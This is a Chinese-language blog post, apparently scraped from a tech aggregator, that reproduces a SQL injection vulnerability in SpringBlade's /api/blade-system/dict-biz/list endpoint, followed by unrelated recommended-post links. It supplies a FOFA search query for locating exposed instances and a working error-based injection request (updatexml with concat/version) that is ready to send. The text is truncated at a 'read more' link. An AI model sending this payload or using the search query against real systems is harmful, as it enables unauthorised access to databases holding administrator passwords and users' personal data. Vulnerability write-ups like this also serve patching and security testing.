SpringBlade dict-biz/list SQL 注入漏洞复现

  • 开发
  • 34

0x01 产品简介

SpringBlade 是一个由商业级项目升级优化而来的 SpringCloud 分布式微服务架构、SpringBoot 单体式微服务架构并存的综合型项目。

0x02 漏洞概述

SpringBlade 后台框架 /api/blade-system/dict-biz/list 路径存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:body="Saber 将不能正常工作"

0x04 漏洞复现

PoC

GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win
阅读全部

相关推荐

  4. 漏洞】NotificationX SQL注入漏洞(CVE-2024-1698)

    2024-04-22 22:30:07       45 阅读

  5. 漏洞】SpringBlade dict-biz SQL注入漏洞

    2024-04-22 22:30:07       37 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-22 22:30:07       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-22 22:30:07       100 阅读

  9. 在Django里面运行非项目文件

    2024-04-22 22:30:07       82 阅读

  19. Python语言-面向对象

    2024-04-22 22:30:07       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-04-22 22:30:07       85 阅读

热门阅读

  3. 【团体程序设计天梯赛 往年关键真题 详细分析&完整AC代码】L2-003 月饼(贪心)& L2-004 这是二叉搜索树吗? (数据结构)

    2024-04-22 22:30:07       45 阅读

  4. 数据结构——线索树

    2024-04-22 22:30:07       76 阅读

  6. 【数据结构】分块查找

    2024-04-22 22:30:07       44 阅读

  13. 每日一练:九九乘法表(双重循环)

    2024-04-22 22:30:07       133 阅读

  15. springboot日志使用 SLF4J+Logback 实现(springboot默认的日志实现),日志打印到控制台及日志输出到指定文件

    2024-04-22 22:30:07       30 阅读

  17. json文件的格式化

    2024-04-22 22:30:07       141 阅读

  18. 双向链表的实现

    2024-04-22 22:30:07       37 阅读

  20. 高级软考项目管理之项目进度管理

    2024-04-22 22:30:07       150 阅读

  23. 计算机网络面试问题

    2024-04-22 22:30:07       132 阅读

  27. pprof火焰图排查问题小计

    2024-04-22 22:30:07       31 阅读